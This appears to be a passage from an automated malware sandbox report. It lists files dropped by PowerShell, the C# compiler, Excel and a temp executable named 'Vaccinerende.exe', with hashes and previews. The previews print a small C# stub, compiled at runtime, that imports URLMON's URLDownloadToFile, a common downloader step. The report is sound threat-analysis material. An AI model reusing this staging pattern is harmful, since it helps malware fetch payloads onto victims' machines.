                                                                            Entropy (8bit):1.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:Qn:Qn
                                                                            MD5:F3B25701FE362EC84616A93A45CE9998
                                                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                            Malicious:false
                                                                            Preview:..
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1
                                                                            Process:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2
                                                                            Entropy (8bit):1.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:Qn:Qn
                                                                            MD5:F3B25701FE362EC84616A93A45CE9998
                                                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                            Malicious:false
                                                                            Preview:..
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1
                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                            File Type:MSVC .res
                                                                            Category:dropped
                                                                            Size (bytes):652
                                                                            Entropy (8bit):3.0964340758179905
                                                                            Encrypted:false
                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grywak7YnqqmPN5Dlq5J:+RI+ycuZhNOakSmPNnqX
                                                                            MD5:EB7F87B9844A14F70E096042DCF75B43
                                                                            SHA1:8BA60699B026816DCD66AD53549FF3A0E2E661C9
                                                                            SHA-256:5A6EA4849524BF85118B7A98CCE5079646A0FA351AB4A95558F70C2E3868FE3D
                                                                            SHA-512:E0A77741C21F38A4D2E2AEDEE036E8372258845575895A305FE3EB7EEF04BBB7AF5805658957212542778926AEC2CFF5D07060E697556406F0D94EE43F40B2ED
                                                                            Malicious:false
                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.4.g.n.3.n.q.1...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...r.4.g.n.3.n.q.1...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (357)
                                                                            Category:dropped
                                                                            Size (bytes):474
                                                                            Entropy (8bit):3.762186518164636
                                                                            Encrypted:false
                                                                            SSDEEP:6:V/DsYLDS81zuWdxFPMAQXReKJ8SRHy4Hsyb4CUQ/aWQy:V/DTLDfuwuXfHU8cy
                                                                            MD5:ED8B0B366B8FD7BDF35FCDDB6A6FC768
                                                                            SHA1:F333BE6ECEC2AC5315DC3CB28FFE6202E6C3E142
                                                                            SHA-256:F179DBF6F56665E7020A3CF42A5150AED8A15253CCBCF368CDC526C88D90D99B
                                                                            SHA-512:1ACE461D8AF56F8002E38EB8274F86C026ABFBFBD851C93D878D9A211EE727005B98C7236F43E1497C0A654BA45DC87AB6ED3EC49C77B3A3013E771381F523CE
                                                                            Malicious:false
                                                                            Preview:.using System;.using System.Runtime.InteropServices;..namespace IksntLgmSqt.{. public class ss. {. [DllImport("URLMON.Dll", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr FwwK,string DHAHgBDF,string BHs,uint TW,IntPtr puzamEd);.. }..}.
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):369
                                                                            Entropy (8bit):5.263210373056614
                                                                            Encrypted:false
                                                                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23f2WjBUzxs7+AEszIP23f2Wjhx:p37Lvkmb6KzeWCWZEoeWlx
                                                                            MD5:FF3EC694C4D12297CE7E6A79101E6A78
                                                                            SHA1:97BDC2021888BB7E8765E2305D0328E8C33E00F8
                                                                            SHA-256:D60ADD9447B2C8CE42B93265B192B8F30617BC1924CEAF948AC53DC38C1BB18D
                                                                            SHA-512:DB6FB4EE68AF2326EBD56F6918711CC2AF00D04BE0174BFF93F2F6F6C1FF88F32061A1149F6C2217472FA60B5C66C6D6BE0C756BEBE64AD758E15A2FE17B251E
                                                                            Malicious:false
                                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.0.cs"
                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):3072
                                                                            Entropy (8bit):2.820523402807047
                                                                            Encrypted:false
                                                                            SSDEEP:24:etGScPBG5eM7p8s8SgkCMqza0RPAc4tkZfcWmYTqhkWI+ycuZhNOakSmPNnq:6zsM+DMoa0LJcWmQEH1ulOa3aq
                                                                            MD5:9DFF303FA503DCEE45EA8C9C17A84AA7
                                                                            SHA1:D071D0C438D2BD427F1EBCEC1E6BB8569BCFE0F8
                                                                            SHA-256:232C2D8B81F0FFD198F2F5BEBB0EC016215086CB4D11219BB6DD3C5CF079D942
                                                                            SHA-512:E45F06F1954BD50327C157F40F747DEE6D41FDDA3EE830FBA373A942C33B5E0587FE35BC481CF4E341247FBDBDF92B99CFAB83EDC5EED3A2937FFC996FA6BB7D
                                                                            Malicious:false
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                            Category:modified
                                                                            Size (bytes):866
                                                                            Entropy (8bit):5.3456684169745525
                                                                            Encrypted:false
                                                                            SSDEEP:24:AId3ka6KzJzEoJOKaMD5DqBVKVrdFAMBJTH:Akka60BEo4KdDcVKdBJj
                                                                            MD5:2F342C93B9CB0BC574B2CD6F690B2381
                                                                            SHA1:5E73CB7142CAE4DCFF76445B6CEDD4E42E415011
                                                                            SHA-256:0C6C5B051FB4C6E4AC649FD8470B2F6176C7CBF4222D10D324AA06BD2E62D5E5
                                                                            SHA-512:94D7BB6671B9C58B12B2DC5027925FD97B044434D8492186A5DF7B8A0D38C0404E03D295709BFEF0D3235F021BADDF33FA63F6A60F17CC6C1E5797ED4E655D15
                                                                            Malicious:false
                                                                            Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1
                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                            File Type:MSVC .res
                                                                            Category:dropped
                                                                            Size (bytes):652
                                                                            Entropy (8bit):3.0906579417448854
                                                                            Encrypted:false
                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grycbak7Ynqq3UPN5Dlq5J:+RI+ycuZhNoakSEPNnqX
                                                                            MD5:5B44818A2DDC174024A1A2F986AA779C
                                                                            SHA1:A502F72A0903E5263EB85F08EE14EB636EFA2E3D
                                                                            SHA-256:5C6931DA4A84E843DCAF0EAE66B57AC2EBBA62543812BA438E69402841F491C6
                                                                            SHA-512:E625D70668F875AF23C86BE7BA72EF5EF355FA5D0D24FDEF3D15EB199E3C82A87D654236FB70DA6EBDBCFFAF04AFD5A722C6B1B6EA097D39FFB313A7EFD6B1BE
                                                                            Malicious:false
                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.m.4.1.l.s.y.u...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...s.m.4.1.l.s.y.u...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (357)
                                                                            Category:dropped
                                                                            Size (bytes):474
                                                                            Entropy (8bit):3.762186518164636
                                                                            Encrypted:false
                                                                            SSDEEP:6:V/DsYLDS81zuWdxFPMAQXReKJ8SRHy4Hsyb4CUQ/aWQy:V/DTLDfuwuXfHU8cy
                                                                            MD5:ED8B0B366B8FD7BDF35FCDDB6A6FC768
                                                                            SHA1:F333BE6ECEC2AC5315DC3CB28FFE6202E6C3E142
                                                                            SHA-256:F179DBF6F56665E7020A3CF42A5150AED8A15253CCBCF368CDC526C88D90D99B
                                                                            SHA-512:1ACE461D8AF56F8002E38EB8274F86C026ABFBFBD851C93D878D9A211EE727005B98C7236F43E1497C0A654BA45DC87AB6ED3EC49C77B3A3013E771381F523CE
                                                                            Malicious:false
                                                                            Preview:.using System;.using System.Runtime.InteropServices;..namespace IksntLgmSqt.{. public class ss. {. [DllImport("URLMON.Dll", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr FwwK,string DHAHgBDF,string BHs,uint TW,IntPtr puzamEd);.. }..}.
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):369
                                                                            Entropy (8bit):5.1912270101390865
                                                                            Encrypted:false
                                                                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fcMBn0zxs7+AEszIP23fcMDHn:p37Lvkmb6Kz0An0WZEo02n
                                                                            MD5:039730D2CD280C0E4E71017A9DD1515D
                                                                            SHA1:A80F3122E1CBE77464D1E3ACEFC5F0A1BB9E14A1
                                                                            SHA-256:DB3E3A5B00DE0B3B170CCDD50AAB956DCDA79561512FCAD2E18FC6F087E5AF45
                                                                            SHA-512:4C367AC592013356F3B7CE8984F01A9EB3E19D34069762B9182A4477E1F3B9B48DEA664C63559F40BE25943CB01E6D50DA054910EBCB2E0394CD134202B38DA8
                                                                            Malicious:true
                                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.0.cs"
                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):3072
                                                                            Entropy (8bit):2.818648307118402
                                                                            Encrypted:false
                                                                            SSDEEP:24:etGScEPBG5eM7p8s8SgkCMqz9RPAc4tkZfhAkqhkWI+ycuZhNoakSEPNnq:6ksM+DMo9LJhAkEH1uloa3Eq
                                                                            MD5:FE6C55C53DD220EEC135C02415641360
                                                                            SHA1:85E96783F68817D90E8092FF66FEA8B050B8C373
                                                                            SHA-256:83585AA42AA44B58D57561546FCD1530E628AD01514C05B98CC35493F8DF5B8B
                                                                            SHA-512:0729DE0C03C3D0970CBE94633ADED207459E490FE3648EA1C263996DDB9C910BC22594E7AE09D97FF7DBB25006B617DE07FAD96E91C01F875AD5F8806D341DF0
                                                                            Malicious:false
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....X.f...........!.................#... ...@....... ....................................@.................................X#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................6./.....r.....r.......................................... =.....P ......O.........U.....Z.....c.....g.....j...O.....O...!.O.....O.......!.....*.......=.......................................&..........<Module>.sm
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                            Category:modified
                                                                            Size (bytes):866
                                                                            Entropy (8bit):5.322229052720327
                                                                            Encrypted:false
                                                                            SSDEEP:24:AId3ka6KzFEoEKaMD5DqBVKVrdFAMBJTH:Akka60FEoEKdDcVKdBJj
                                                                            MD5:CF6AEDC19818156F769B77F70B5CAB34
                                                                            SHA1:EA7C74184D94074459A68B739ECB338B94FAF2AD
                                                                            SHA-256:A5ABBFCDBF4E3578A87F81B519DE9AAD652C7392792E19F72613FFC9877A09D9
                                                                            SHA-512:778B8F9116CCD2261F1E578CD2AA100EA0A3BD83C94D3D55273975F8AA6C658DB2045398933B783595AA44FFC6BCE738F5DCFB5EF8C1804A0302CD2B0E3AD5B4
                                                                            Malicious:false
                                                                            Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                            Process:C:\Users\user\AppData\Local\Temp\Vaccinerende.exe
                                                                            File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2
                                                                            Entropy (8bit):1.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:Qn:Qn
                                                                            MD5:F3B25701FE362EC84616A93A45CE9998
                                                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                            Malicious:false
                                                                            Preview:..
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1
                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):512
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3::
                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                            Malicious:false
                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):512
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3::
                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                            Malicious:false
                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):512
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3::
                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                            Malicious:false
                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):6045
                                                                            Entropy (8bit):3.594929128718409
                                                                            Encrypted:false
                                                                            SSDEEP:96:HXhQC4O4IaqvsqvJCwoxet17vH+iJ17vHKic:HXGaoxetMiJwic
                                                                            MD5:5906BB14A16B030E6BD3D6FFAB167177
                                                                            SHA1:55C12313C7552AC731F02315B24F358BD72C3688
                                                                            SHA-256:99BC473532D017B74B561D45CB23C7827527F080494A6FD4FD7EE9D7518F5033
                                                                            SHA-512:5988E3BD1F187CAA4C2639AAAE30EF1D76FCE721BAA3B0FACCDC4FE02BE48D88A1A43B6752B578CB3BC6A6C46F9C56CDC9132877618EE851194398D822C23243
                                                                            Malicious:false
